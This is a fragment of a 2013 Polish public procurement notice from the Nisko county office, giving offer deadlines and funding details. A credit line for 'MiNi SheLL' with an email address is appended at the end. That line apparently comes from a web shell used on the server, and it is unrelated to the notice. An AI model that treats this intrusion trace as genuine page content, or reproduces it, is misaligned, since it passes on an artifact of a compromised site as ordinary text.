<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2013 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku. Pl. Wolności 2, 37 - 400 Nisko w Biurze Obsługi Interesanta (pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com